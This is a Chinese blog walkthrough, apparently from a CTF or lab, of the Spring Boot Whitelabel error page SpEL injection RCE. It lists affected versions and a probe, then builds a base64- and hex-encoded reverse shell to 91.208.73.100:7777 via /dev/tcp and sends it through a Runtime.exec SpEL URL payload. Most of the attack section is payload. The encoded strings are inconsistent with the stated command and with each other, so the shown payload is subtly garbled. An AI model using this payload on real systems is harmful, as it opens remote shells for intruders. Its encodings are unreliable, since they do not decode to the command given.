spring-boot-whitelabel-spel命令执行

一、漏洞概述

spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞。

二、影响范围

spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0

三、漏洞验证

1、访问页面,/article?id=1

2、访问页面,/article?id=${5*5},执行了公式说明存在 SpEL 表达式注入漏洞。

四、漏洞复现

1、生成反弹shell

首先把
bash -c {echo,bash -i >& /dev/tcp/91.208.73.100/7777 0>&1}|{base64,-d}|{bash,-i}
中的bash -i >& /dev/tcp/91.208.73.100/7777 0>&1进行
base64编码后得到
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC85MgffdgDguNzMuMTA4Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
再进行Hex编码
%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%35%4d%53%34%79%4d%44%67%75%4e%67%64%66%67%75%4d%54%41%34%4c%7a%63%33%4e%7a%63%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d
再把%替换成,0x最终的payload长这个样子。
0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x34,0x4d,0x50,0x34,0x79,0x4d,0x44,0x67,0x75,0x4e,0x7a,0x4d,0x75,0x4d,0x54,0x41,0x34,0x4c,0x7a,0x63,0x33,0x4e,0x7a,0x63,0x67,0x4d,0x44,0x34,0x6d,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x70,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d

2、使用payload进行访问

/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x34,0x4d,0x50,0x34,0x79,0x4d,0x44,0x67,0x75,0x4e,0x7a,0x4d,0x75,0x4d,0x54,0x41,0x34,0x4c,0x7a,0x63,0x33,0x4e,0x7a,0x63,0x67,0x4d,0x44,0x34,0x6d,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x70,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}

3、在vps服务器监听,获得flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值